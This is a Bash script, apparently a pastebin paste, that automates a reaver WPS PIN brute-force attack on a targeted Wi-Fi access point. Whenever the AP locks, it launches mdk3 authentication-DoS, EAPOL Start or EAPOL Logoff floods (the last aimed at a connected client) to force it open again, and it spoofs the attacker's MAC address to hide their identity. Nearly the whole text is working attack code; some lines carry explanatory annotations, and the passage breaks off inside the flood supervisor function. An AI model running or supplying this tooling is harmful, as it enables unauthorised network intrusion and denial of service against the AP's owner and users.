demonneni

[WPS/Reaver] mdk3 flood attack (script sh)

Nov 20th, 2014
  1. #!/bin/bash
  2. declare MAC;
  3. declare PIN_TIME;
  4. declare WLAN;
  5. declare MON1;
  6. declare MON2;
  7. declare MON3;
  8. declare PHY_OF_WLAN_1;
  9. declare NO_OF_MONITOR_INTERFACES_CHECK;
  10. declare MONITOR_INTERFACES;
  11. declare STOP_INTERFACE;
  12. declare VARIABLE;
  13. declare CHANNEL;
  14. declare DISTANCE_BETWEEN_PINS;
  15. declare TIMEOUT;
  16. declare ESSID;
  17. declare SATISFIED_OPTION=r;
  18. declare REAVER_COMMAND_LINE;
  19. declare MDK3_MAIN_MENU_OPTION;
  20. declare RETURN_OPTION_FOR_AUTH_DOS_FOR_AUTH_DOS;
  21. declare RETURN_OPTION_FOR_EAPOL_START_FLOOD;
  22. declare EAPOL_START_FLOOD_COMMAND;
  23. declare AUTH_DOS_FLOOD_COMMAND;
  24. declare RETURN_OPTION_FOR_EAPOL_LOG_OFF_FLOOD;
  25. declare EAPOL_LOG_OFF_FLOOD_COMMAND;
  26. declare VARIABLE_CHECK_FOR_RATE_LIMITING;
  27. declare TARGET_STATION;
  28. declare MDK3_KILLALL_1
  29. declare AIREPLAY_KILLALL;
  30. declare SUCCESSIVE_EAPOL_FAILURES;
  31. declare AIREPLAY_RESET;
  32. declare MONITOR_INTERFACES_CHECK;
  33.  
  34. #WELCOM MESSAGE
  35. echo -e "\e[36m\e[1m###########################\e[0m";
  36. echo -e "\e[36m\e[1m# WELCOME TO ReVdK3 Script#  \e[35m\e[1mC\e[92m\e[1mR\e[91m\e[1mE\e[34m\e[1mA\e[33m\e[1mT\e[96m\e[1mE\e[35m\e[1mD  \e[92m\e[1mB\e[35m\e[1mY\e[0m : \e[35m\e[1mR\e[92m\e[1mE\e[91m\e[1mP\e[34m\e[1mZ\e[33m\e[1mE\e[96m\e[1mR\e[35m\e[1mO\e[92m\e[1mW\e[91m\e[1mO\e[34m\e[1mR\e[33m\e[1mL\e[96m\e[1mD\e[35m\e[1m\e[0m";
  37. echo -e "\e[36m\e[1m###########################\e[0m";
  38. echo -e "\e[36m\e[1m#####################################################################\e[0m";
  39. echo -e "\e[36m\e[1m# This Script allows you to use reaver and an mdk3 flood attack that#\e[0m";
  40. echo -e "\e[36m\e[1m# you choose                                                        #\e[0m";
  41. echo -e "\e[36m\e[1m#####################################################################\e[0m";
  42. echo -e "\e[36m\e[1m# This Script was created for Access Points that locks up for long  #\e[0m";
  43. echo -e "\e[36m\e[1m# periods of time. It works by starting reaver and continously      #\e[0m";
  44. echo -e "\e[36m\e[1m# detect when reaver is rate limiting pins, once reaver detects     #\e[0m";
  45. echo -e "\e[36m\e[1m# the AP is rate limiting pins, it starts mdk3 attacks. mdk3 attacks#\e[0m";
  46. echo -e "\e[36m\e[1m# are killed once reaver detects that the AP has unlocked itself !  #\e[0m";
  47. echo -e "\e[36m\e[1m# The prcoess goes on...                                            #\e[0m";
  48. echo -e "\e[36m\e[1m#####################################################################\e[0m";
  49. echo ;
  50. echo  -e "\e[37m\e[44m\e[1m ReVdK3.sh-r1 (Revision 1)- see README\e[0m";
  51. echo ;
  52. echo -e "\e[37m\e[44m\e[1mThanks to N1ksan for some useful ideas in this revision!\e[0m";
  53. echo ;
  54. echo -e "\e[36m\e[40m\e[1m******************************************************\e[0m";
  55. echo -e "\e[36m\e[40m\e[1m* Welcome: I need to verify your wireless interface  *\e[0m";
  56. echo -e "\e[36m\e[40m\e[1m******************************************************\e[0m";
  57. echo ;
# Ask for the wireless interface until the name typed equals the first
# tab-separated column that `airmon-ng | grep` returns for it.
while :; do
  read -p "Which wireless interface you will be using? e.g wlan1, wlan2 etc": WLAN
  EXISTENCE_OF_WLAN=$(airmon-ng | grep "$WLAN" | cut -f1)
  if [ -z "$WLAN" -o "$EXISTENCE_OF_WLAN" != "$WLAN" ]; then
    printf '%b\n' "\e[31m\e[1mYou input a wireless interface that doesn't exist!\e[0m" ''
  else
    break
  fi
done

# Look up the phy name printed next to the chosen interface, then collect every
# airmon-ng line that mentions that phy. The unquoted $WLAN and [:space:] are
# kept exactly as the original wrote them.
PHY_OF_WLAN_1=$(airmon-ng | grep $WLAN | cut -d ' ' -f4)
NO_OF_MONITOR_INTERFACES_CHECK=$(airmon-ng | grep -F "$PHY_OF_WLAN_1" | wc -l)
MONITOR_INTERFACES=$(airmon-ng | grep -F "$PHY_OF_WLAN_1" | cut -f1 | tr -s [:space:] ' ')

# More than one line for the phy means other interfaces already sit on this
# radio: stop each of them except the base interface itself.
printf '%b\n' "\e[36m\e[1mKilling any existing monitor interface(s) on $WLAN\e[0m"
if [ "$NO_OF_MONITOR_INTERFACES_CHECK" != 1 ]; then
  for STOP_INTERFACE in $MONITOR_INTERFACES; do
    [ "$STOP_INTERFACE" = "$WLAN" ] && continue
    airmon-ng stop $STOP_INTERFACE > /dev/null
  done
fi
printf '%b\n' "\e[36m\e[1mSuccessful!\e[0m"

# Run `airmon-ng start` three times on the same base interface and store the
# interface name parsed from each "(monitor mode enabled on ...)" line in
# MON1, MON2 and MON3.
printf '%b\n' "\e[36m\e[1mStarting three new monitor modes...\e[0m"
for monitor_slot in MON1 MON2 MON3; do
  printf -v "$monitor_slot" '%s' \
    "$(airmon-ng start $WLAN | grep -F '(monitor mode enabled on ' | tr -s [:space:] ' ' | cut -d ' ' -f6 | tr -d ')')"
done
echo "Successful!"
  83. trap 'echo -e "\n\e[36m\e[1mCleaning up all temporary files created by this script..good house keeping...ensuring all processes are killed!\e[31m\e[0m"; killall mdk3 2> /dev/null; killall reaver 2> /dev/null; killall tail 2> /dev/null; rm -f /etc/reaver_tmp.txt 2> /dev/null; airmon-ng stop "$MON1" > /dev/null; airmon-ng stop "$MON2" > /dev/null; airmon-ng stop "$MON3" > /dev/null; killall aireplay-ng 2> /dev/null; rm -f /etc/aireplay_tmp.txt 2> /dev/null; killall -9 ReVdK3-r1.sh > /dev/null; '  SIGINT SIGHUP
  84. clear
# Reaver configuration wizard. The loop body repeats for as long as the
# operator answers 'r' at the final prompt. Each pass collects the target
# BSSID and ESSID, rewrites the MAC address of the interfaces, reads the
# optional -c/-d/-t values and assembles REAVER_COMMAND_LINE.
while [ "$SATISFIED_OPTION" = r  ]; do
clear
echo ;
echo -e "\e[36m\e[40m\e[1m***********************************\e[0m";
echo -e "\e[36m\e[40m\e[1m*Welcome to Reaver's configuration*\e[0m";
echo -e "\e[36m\e[40m\e[1m***********************************\e[0m";
echo ;
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx        MAC ADDRESS OF AP              x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
# Only emptiness is checked; the answer is not validated as a MAC address.
read -p "What is the mac address of the access point you are targeting?": MAC;
while [ -z "$MAC" ]; do
echo -e "\e[31m\e[1mYou need to input the target's MAC address\e[0m";
echo ;
read -p "What is the mac address of the access point you are targeting?": MAC;
done
echo "MAC address saved...";
echo ;
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx        ESSID OF AP                    x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
# Same treatment for the ESSID: any non-empty string is accepted.
read -p "What is the essid of the access point you are targeting": ESSID;
while [ -z "$ESSID" ]; do
echo -e "\e[31m\e[1mYou need to input the target's ESSID when running aireplay-ng &/or running mdk3 eapol start flood attacks!\e[0m";
echo ;
read -p "What is the essid of the access point you are targeting": ESSID;
done
echo "ESSID saved...";
# Take every interface down, set the same literal address on all four, then
# bring the three monitor interfaces back up (WLAN is not brought up again
# here). macchanger's output is discarded, so a failed change is not reported.
# NOTE(review): the address is a hard-coded constant, identical on every run;
# to the extent the tools transmit with the interface address it is a stable
# value to match on in wireless monitoring.
echo -e "\e[36m\e[1mI am hiding your identity by changing your mac\e[0m";
sleep 2;
ifconfig $WLAN down;
ifconfig $WLAN down;
ifconfig $WLAN down;
ifconfig $MON1 down;
ifconfig $MON1 down;
ifconfig $MON2 down;
ifconfig $MON2 down;
ifconfig $MON3 down;
ifconfig $MON3 down;
macchanger -m '78:03:40:02:94:8f' "$WLAN"> /dev/null;
macchanger -m '78:03:40:02:94:8f' "$MON1"> /dev/null;
macchanger -m '78:03:40:02:94:8f' "$MON2"> /dev/null;
macchanger -m '78:03:40:02:94:8f' "$MON3"> /dev/null;
ifconfig $MON1 up;
ifconfig $MON1 up;
ifconfig $MON2 up;
ifconfig $MON2 up;
ifconfig $MON3 up;
ifconfig $MON3 up;
echo;
echo ;
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx                              Reaver's Options                              x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx                                                                            x\e[0m";
echo -e "\e[36m\e[40m\e[1mx[1] Channel Option (-c)                                                     x\e[0m";
echo -e "\e[36m\e[40m\e[1mx(note: Some Access Point hop to another channel when they reboot!           x\e[0m";
echo -e "\e[36m\e[40m\e[1mx............................................................................x\e[0m";
echo -e "\e[36m\e[40m\e[1mx[2] Timeout Option (-t)                                                     x\e[0m";
echo -e "\e[36m\e[40m\e[1mx(Reaver's to wait for a message from the AP)                                x\e[0m";
echo -e "\e[36m\e[40m\e[1mx............................................................................x\e[0m";
echo -e "\e[36m\e[40m\e[1mx[3] Reaver's time between pin (-d)                                          x\e[0m";
echo -e "\e[36m\e[40m\e[1mx                                                                            x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
# Channel: accepted values are 1 to 16 or an empty answer (the trailing `|`
# inside @(...) is the empty alternative).
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx        CHANNEL SWITCH                 x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
read -p "What channel you want reaver listen on (-c flag), or press ENTER to use default reaver's option": CHANNEL;
while [[ "$CHANNEL" != @(1|2|3|4|5|6|7|8|9|10|11|12|13|14|15|16|)  ]]; do
echo -e "\e[31m\e[1mYou need to input a channel number between 1-16\e[0m";
echo ;
read -p "What channel you want reaver listen on (-c flag), or press ENTER to use default reaver's option": CHANNEL;
done
# Delay between PIN attempts. The pattern is one bracket expression followed
# by `*`, so it rejects an answer based on its first character only: '-', any
# letter except 'r', '0', a space, '*' or one of the listed punctuation marks.
# An empty answer passes, and so does any answer that starts with 1-9,
# whatever follows the first character.
echo ;
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx        PIN DELAY SWITCH               x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
read -p  "How much time in seconds for distance between pin attempts? (-d flag), if you want to use default option press ENTER ": DISTANCE_BETWEEN_PINS
while [[  $DISTANCE_BETWEEN_PINS = ["-"A-Za-qs-z'`''~''@''#''$''%''^''&''*''('')''_''+''=''|''['']''{''}''\'"'"'"'';'':'',''.''<''>''/''?'' *''0']*  ]]; do
echo -e "\e[31m\e[1mYou need to choose a postive number!\e[0m";
echo ;
read -p  "How much time in seconds for distance between pin attempts? (-d flag), if you want to use default option press ENTER ": DISTANCE_BETWEEN_PINS
done
# Receive timeout: validated with the same first-character pattern as above.
# The retry prompt below contains a literal line break inside its string.
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx        TIMEOUT SWITCH                 x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
read -p "How much time in seconds for reaver to timeout if the AP doesn't respond? (-t flag), if you want to use default option press ENTER": TIMEOUT;
while [[  $TIMEOUT = ["-"A-Za-qs-z'`''~''@''#''$''%''^''&''*''('')''_''+''=''|''['']''{''}''\'"'"'"'';'':'',''.''<''>''/''?'' *''0']*  ]]; do
echo -e "\e[31m\e[1mYou need to choose a postive number!\e[0m";
echo ;
read -p "How much time in seconds for reaver to timeout if the AP doesn't respond? (-t flag), if you want to use default
option press ENTER": TIMEOUT;
echo ;
done
echo ;
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx    REAVER COMMAND LINE YOU HAVE CHOOSEN     x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;

# Eight mutually exclusive tests, one for each combination of empty and
# non-empty CHANNEL, DISTANCE_BETWEEN_PINS and TIMEOUT. Each one prints the
# command and stores the same text in REAVER_COMMAND_LINE, which the REAVER
# function later expands unquoted to run it. Options present in every variant:
# -i $MON1, -b $MAC, -S, -l 10, -N and -vv; -c, -d and -t are added only when
# the corresponding answer was non-empty.
if [ -z "$CHANNEL" -a -n "$DISTANCE_BETWEEN_PINS" -a "$TIMEOUT" ]; then
echo "reaver -i $MON1 -b $MAC -S -d $DISTANCE_BETWEEN_PINS -t $TIMEOUT -l 10 -N -vv";
REAVER_COMMAND_LINE=`echo "reaver -i $MON1 -b $MAC -S -d $DISTANCE_BETWEEN_PINS -t $TIMEOUT -l 10 -N -vv"`;
echo ;
fi
if [ -z "$DISTANCE_BETWEEN_PINS" -a -n "$CHANNEL" -a -n "$TIMEOUT" ]; then
echo "reaver -i $MON1 -b $MAC -S -c $CHANNEL -t $TIMEOUT -l 10 -N -vv";
REAVER_COMMAND_LINE=`echo "reaver -i $MON1 -b $MAC -S -c $CHANNEL -t $TIMEOUT -l 10 -N -vv"`;
echo;
fi
if [ -z "$TIMEOUT" -a -n "$DISTANCE_BETWEEN_PINS" -a -n "$CHANNEL" ]; then
echo "reaver -i $MON1 -b $MAC -S -c $CHANNEL -d $DISTANCE_BETWEEN_PINS -l 10 -N -vv";
REAVER_COMMAND_LINE=`echo "reaver -i $MON1 -b $MAC -S -c $CHANNEL -d $DISTANCE_BETWEEN_PINS -l 10 -N -vv"`;
echo ;
fi
if [ -z "$CHANNEL" -a -z "$DISTANCE_BETWEEN_PINS" -a -n "$TIMEOUT" ]; then
echo "reaver -i $MON1 -b $MAC -S -t $TIMEOUT -l 10 -N -vv";
REAVER_COMMAND_LINE=`echo "reaver -i $MON1 -b $MAC -S -t "$TIMEOUT" -l 10 -N -vv"`;
echo ;
fi
if [ -z "$CHANNEL" -a -z "$TIMEOUT" -a -n "$DISTANCE_BETWEEN_PINS" ]; then
echo "reaver -i $MON1 -b $MAC -S -d $DISTANCE_BETWEEN_PINS -l 10  -N -vv";
REAVER_COMMAND_LINE=`echo "reaver -i $MON1 -b $MAC -S -d $DISTANCE_BETWEEN_PINS -l 10 -N -vv"`;
echo ;
fi
if [ -z "$DISTANCE_BETWEEN_PINS" -a -z "$TIMEOUT" -a -n "$CHANNEL" ]; then
echo "reaver -i $MON1 -b $MAC -S -c $CHANNEL -l 10 -N -vv";
REAVER_COMMAND_LINE=`echo "reaver -i $MON1 -b $MAC -S -c $CHANNEL -l 10 -N -vv"`;
echo ;
fi
if [ -z "$DISTANCE_BETWEEN_PINS" -a -z "$TIMEOUT" -a -z "$CHANNEL" ]; then
echo "reaver -i $MON1 -b $MAC -S -l 10 -N -vv";
REAVER_COMMAND_LINE=`echo "reaver -i $MON1 -b $MAC -S -l 10 -N -vv"`;
fi
if [ -n "$DISTANCE_BETWEEN_PINS" -a -n "$TIMEOUT" -a -n "$CHANNEL" ]; then
echo "reaver -i $MON1 -b $MAC -S -c $CHANNEL -d $DISTANCE_BETWEEN_PINS -t $TIMEOUT -l 10 -N -vv";
REAVER_COMMAND_LINE=`echo "reaver -i $MON1 -b $MAC -S -c $CHANNEL -d $DISTANCE_BETWEEN_PINS -t $TIMEOUT -l 10 -N -vv"`;
echo ;
fi
echo ;
# Any answer other than 'r' (including an empty one) ends the wizard.
read -p "Are you satisified with this configuration? if not,  input 'r' and you will be returned to Reaver's Configuration Wizard": SATISFIED_OPTION;
done
# Start the session with empty logs: drop whatever a previous run left behind.
# Both files live under /etc at fixed names, so they are easy to look for when
# checking a host for traces of this script.
[ -e /etc/reaver_tmp.txt ] && rm -f /etc/reaver_tmp.txt
[ -e /etc/aireplay_tmp.txt ] && rm -f /etc/aireplay_tmp.txt
clear
# Show the flood-mode menu, read a choice of 1, 2 or 3 into
# MDK3_MAIN_MENU_OPTION (re-prompting on anything else) and hand over to the
# matching sub-menu. The MDK3 supervisor reads the same variable later to pick
# the mdk3 mode it launches.
MDK3_MAIN_MENU() {
  printf '%b\n' \
    "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m" \
    "\e[36m\e[40m\e[1mx                  WELCOME TO MDK3 FLOOD ATTACK MAIN MENU                    x\e[0m" \
    "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m" \
    "\e[36m\e[40m\e[1mx[1] Authentication DoS Flood Attack                                         x\e[0m" \
    "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m" \
    "\e[36m\e[40m\e[1mx[2] EAPOL Start Flood Attack                                                x\e[0m" \
    "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m" \
    "\e[36m\e[40m\e[1mx[3] EAPOL log off Flood Attack                                              x\e[0m" \
    "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m" \
    "\e[36m\e[40m\e[1mx NOTE:This script will stop reaver once it detects the AP is locked and     x\e[0m" \
    "\e[36m\e[40m\e[1mx then flood the Access Point for the time period you choose after flooding  x\e[0m" \
    "\e[36m\e[40m\e[1mx reaver resumes.This process goes on until reaver finds the correct pin!    x\e[0m" \
    "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m" \
    ''

  # Keep asking until the answer is exactly 1, 2 or 3.
  while :; do
    read -p "Which Attack You Prefer to carry out(Input No.)?": MDK3_MAIN_MENU_OPTION
    [[ "$MDK3_MAIN_MENU_OPTION" == @(1|2|3) ]] && break
    printf '%b\n' "\e[31m\e[1mIncorrect Option choosen, Please choose an option from the Main Menu!\e[0m" ''
  done

  # Three independent tests rather than an if/elif chain, as in the original.
  if [[ "$MDK3_MAIN_MENU_OPTION" == 1 ]]; then
    clear
    AUTH_DOS_MAIN_MENU
  fi
  if [[ "$MDK3_MAIN_MENU_OPTION" == 2 ]]; then
    clear
    EAPOL_START_FLOOD_ATTACK_MAIN_MENU
  fi
  if [[ "$MDK3_MAIN_MENU_OPTION" == 3 ]]; then
    clear
    EAPOL_LOG_OFF_ATTACK_MAIN_MENU
  fi
}
###########################################################################
# Sub-menu for option 1. Prints a description and the mdk3 command line for
# mode "a" (one instance per monitor interface), then either returns to the
# main menu on 'r' or starts the four workers. The command string built here is
# only displayed; the MDK3 function composes its own invocations.
AUTH_DOS_MAIN_MENU() {
  printf '%b\n' \
    "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m" \
    "\e[36m\e[40m\e[1mx                  Authentication DoS Flood Attack                           x\e[0m" \
    "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m" \
    "\e[36m\e[40m\e[1mxNOTE:This Attack will start flooding the AP with numerous fake clients      x\e[0m" \
    "\e[36m\e[40m\e[1mxuntil reaver detects that the AP is unlocked. The attack will restart when  x\e[0m" \
    "\e[36m\e[40m\e[1mxthe AP has locked itself again...the process goes on!                       x\e[0m" \
    "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m" \
    '' \
    "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m" \
    "\e[36m\e[40m\e[1mxThe Authentication DoS Flood Command line below will be used     x\e[0m" \
    "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m" \
    ''

  AUTH_DOS_FLOOD_COMMAND=$(echo -e "\e[36m\e[1mmdk3 $MON1 a -a $MAC -s 200 & mdk3 $MON2 a -a $MAC -s 200 & mdk3 "$MON3" a -a $MAC -s 200\e[0m")
  echo "$AUTH_DOS_FLOOD_COMMAND"
  echo

  read -p "To start the attack press ENTER  to proceed or input 'r' to return to mdk3 main menu": RETURN_OPTION_FOR_AUTH_DOS_FOR_AUTH_DOS
  if [[ "$RETURN_OPTION_FOR_AUTH_DOS_FOR_AUTH_DOS" == r ]]; then
    clear
    MDK3_MAIN_MENU
  fi

  printf '%b\n' "\e[36m\e[1mStarting MDK3 Auth Flood Attack...\e[0m"
  sleep 3
  clear

  # Three workers go to the background; TAIL stays in the foreground and owns
  # the terminal.
  REAVER &
  AIREPLAY &
  MDK3 &
  TAIL
}
###########################################################################
# Sub-menu for option 2. Prints a description and the mdk3 command line for
# mode "x 0" (EAPOL Start frames, addressed with the BSSID and ESSID), then
# either returns to the main menu on 'r' or starts the four workers. The
# command string built here is only displayed.
EAPOL_START_FLOOD_ATTACK_MAIN_MENU() {
  printf '%b\n' \
    "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m" \
    "\e[36m\e[40m\e[1mx                  EAPOL Start Flood Attack                                  x\e[0m" \
    "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m" \
    "\e[36m\e[40m\e[1mxNOTE:This Attack will start flooding the AP with numerous EAPOL start       x\e[0m" \
    "\e[36m\e[40m\e[1mxpackets until reaver detects that the AP is unlocked. The attack will       x\e[0m" \
    "\e[36m\e[40m\e[1mxrestart when the AP has locked itself again...the process goes on!          x\e[0m" \
    "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m" \
    '' \
    "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m" \
    "\e[36m\e[40m\e[1mxThe Authentication EAPOL Start Flood Attack Command line below will be usedx\e[0m" \
    "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m" \
    ''

  EAPOL_START_FLOOD_COMMAND=$(echo -e "\e[36m\e[1mmdk3 $MON1 x 0 -t $MAC -n $ESSID -s 200 & mdk3 $MON2 x 0 -t $MAC -n $ESSID -s 200 & mdk3 $MON3 x 0 -t $MAC -n $ESSID -s 200\e[0m")
  echo "$EAPOL_START_FLOOD_COMMAND"

  read -p "To start the attack press ENTER  to proceed or input 'r' to return to mdk3 main menu": RETURN_OPTION_FOR_EAPOL_START_FLOOD
  if [[ "$RETURN_OPTION_FOR_EAPOL_START_FLOOD" == r ]]; then
    clear
    MDK3_MAIN_MENU
  fi

  printf '%b\n' "\e[36m\e[1mStarting MDK3 EAPOL Start Flood Attack...\e[0m"
  sleep 3
  clear

  # Three workers go to the background; TAIL stays in the foreground.
  REAVER &
  AIREPLAY &
  MDK3 &
  TAIL
}
###########################################################################
# Sub-menu for option 3. Asks for the MAC address of a connected client
# (required, but checked only for emptiness), prints the mdk3 command line for
# mode "x 1" (EAPOL Logoff frames for that client), then either returns to the
# main menu on 'r' or starts the four workers. The command string built here
# is only displayed.
EAPOL_LOG_OFF_ATTACK_MAIN_MENU() {
  printf '%b\n' \
    "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m" \
    "\e[36m\e[40m\e[1mx                  EAPOL Log Off Flood Attack                                x\e[0m" \
    "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m" \
    "\e[36m\e[40m\e[1mxNOTE:This Attack will start flooding the AP with numerous EAPOL log off     x\e[0m" \
    "\e[36m\e[40m\e[1mxpackets until reaver detects that the AP is unlocked. The attack will       x\e[0m" \
    "\e[36m\e[40m\e[1mxrestart when the AP has locked itself again...the process goes on!          x\e[0m" \
    "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m" \
    ''

  # The first prompt and the retry prompt differ slightly in wording.
  read -p "What is the MAC address of one of the client's connected?": TARGET_STATION
  while [[ -z "$TARGET_STATION" ]]; do
    printf '%b\n' "\e[31m\e[1mYou cannot leave this field blank\e[0m" ''
    read -p "What is the MAC address of one of the client connected?": TARGET_STATION
  done

  printf '%b\n' \
    "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m" \
    "\e[36m\e[40m\e[1mxThe Authentication EAPOL Log Off Flood Attack Command line below will be usedx\e[0m" \
    "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m" \
    ''

  EAPOL_LOG_OFF_FLOOD_COMMAND=$(echo -e "\e[36m\e[1mmdk3 $MON1 x 1 -t $MAC  -s 200 -c $TARGET_STATION & mdk3 $MON2 x 1 -t $MAC -s 200 -c $TARGET_STATION & mdk3 $MON3 x 1 -t $MAC -s 200 -c $TARGET_STATION\e[0m")
  echo "$EAPOL_LOG_OFF_FLOOD_COMMAND"

  read -p "To start the attack press ENTER  to proceed or input 'r' to return to mdk3 main menu": RETURN_OPTION_FOR_EAPOL_LOG_OFF_FLOOD
  if [[ "$RETURN_OPTION_FOR_EAPOL_LOG_OFF_FLOOD" == r ]]; then
    clear
    MDK3_MAIN_MENU
  fi

  printf '%b\n' "\e[36m\e[1mStarting MDK3 EAPOL Log Off Flood Attack...\e[0m"
  sleep 3
  clear

  # Three workers go to the background; TAIL stays in the foreground.
  REAVER &
  AIREPLAY &
  MDK3 &
  TAIL
}
  362. ##########################################################################
  363. function REAVER {  
  364. echo y|$REAVER_COMMAND_LINE|tee -a /etc/reaver_tmp.txt > /dev/null & aireplay-ng $MON1 -1 100000000 -a "$MAC" -e "$ESSID" -Q -q3 2> /dev/null| tee /etc/aireplay_tmp.txt > /dev/null;
  365. }
###########################################################################
# Supervisor worker. Polls reaver's log (/etc/reaver_tmp.txt) and starts or
# stops the mdk3 mode selected in MDK3_MAIN_MENU_OPTION. The outer loop never
# ends and contains no sleep of its own, so it polls continuously whenever
# neither inner loop is active.
#
# Strings it reacts to, matched literally against reaver's output:
#   "[!] WARNING: Detected AP rate limiting, waiting 10 seconds before re-checking"
#   "[!] WARNING: 25 successive start failures"
function MDK3 {
while :; do
# Snapshot: is any process matching "mdk3" listed, what is the last log line,
# and does the failure warning appear in the last four log lines.
